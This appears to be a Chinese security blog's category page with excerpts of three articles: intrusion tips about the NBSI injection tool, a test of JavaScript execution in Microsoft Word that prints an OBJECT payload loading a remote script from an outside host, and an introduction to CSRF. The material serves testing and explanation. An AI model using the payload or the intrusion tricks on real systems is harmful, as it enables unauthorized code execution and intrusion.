分类 ‘技术文章’ 下的日志
我在入侵过程中注意到的细节(一)
作者:lcx
来源:vbs小铺
《黑客手册200801》
我在入侵过程中注意到的细节(一)
lcx
细节决定成败,不但对于写程序、渗透入侵甚至人生都是如此。谈人生就有点深奥了,还是来谈谈入侵吧。记得很久前有一位同事,注入的时候,在sa权限什么命令都能执行的情况下竟然入侵花费了三天左右的时间,为什么呢?这是因为他在NBSI下输了个time命令,想看下服务器的时间,结果命令无法应答,注入点宕在哪儿了,再也没办法执行其它命令了,直到服务器重启。有的写的不好的木马,如果执行time命令也会自动退出。如果注意到了这个细节的话,最好的执行办法就是time /t。
这一期我不谈注入,针对我在内网入侵的经验,来谈一下细节吧。
阅读全文 »
对MS word javascript execution的一些测试
作者:余弦
来源:0×37 Security
Microsoft word javascript execution原文:http://marc.info/?l=bugtraq&m=121121432823704&w=2,hi群内讨论过。可以得出一些结论:
1、由于安装Q313675 安全修补程序后禁用ActiveX 内联数据流功能,使得利用JS直接创建ActiveX对象而执行恶意codz的方法不可行。如下code:
<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:document.write('<script src=http://www.0x37.com/doc.js></script>')"></OBJECT>
这个远程的doc.js文件能力有限。但是弹出对话框或一个新窗口还是可以的。
阅读全文 »
CSRF: 不要低估了我的危害和攻击能力
作者:iceskysl
来源:IceskYsl@1sters!
CSRF这种攻击方式虽然提出来很久(在2006年的时候就有了)了,但是这个沉睡的攻击巨人直到前不久才逐渐走入我们的视线,到底CSRF是啥,危害到底有多大?常见的利用方式是如何的,今天作为“安全相关 | Security”分类的第一篇文章,我按照自己的理解告诉你,不要低估了CSRF危害性和攻击能力。
一、什么是CSRF
先看看CSRF的原文说明,如下:
Tags: CSRF, rails, tokenCross Site Reference Forgery works by including malicious code or a link in a page that accesses a web application that the user is believed to have authenticated. If the session for that web application has not timed out, an attacker may execute unauthorized commands.